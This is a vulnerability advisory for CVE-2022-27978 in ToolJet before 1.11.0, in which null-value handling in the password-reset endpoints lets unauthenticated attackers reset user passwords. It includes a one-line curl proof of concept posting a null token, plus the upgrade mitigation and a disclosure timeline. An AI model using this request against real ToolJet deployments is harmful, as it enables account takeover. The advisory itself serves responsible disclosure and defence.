Advisory
Software: ToolJet
Vendor: ToolJet Solutions Inc.
Affected Versions: < 1.11.0
CVE: CVE-2022-27978
CWE IDs: 230
Reporter: Chris Grieger
Description
https://github.com/ToolJet/ToolJet
ToolJet is an open-source low-code framework to build and deploy internal tools quickly without much effort from the engineering teams. You can connect to your data sources, such as databases (like PostgreSQL, MongoDB, Elasticsearch, etc), API endpoints (ToolJet supports importing OpenAPI spec & OAuth2 authorization), and external services (like Stripe, Slack, Google Sheets, Airtable) and use our pre-built UI widgets to build internal tools.
Through improper handling of null values inside the /api/users/set_password_from_token and /api/reset_password endpoints it is possible for an unauthenticated attacker to change the password of a random user account.
Combined with a brute-force or a credential spray attack, this can lead to account compromise.
POC
curl --request POST \
--url http://localhost:3000/api/users/set_password_from_token \
--header 'Content-Type: application/json' \
--header 'Host: localhost:3000' \
--data '{"token":null,"password":"pwned"}'Mitigation
Update ToolJet to a version >= 1.11.0.
Timeline
| Date | Action |
|---|---|
| 2022/03/20 | Contacted developers with security finding, POC and mitigation note. |
| 2022/04/22 | Fix version released. |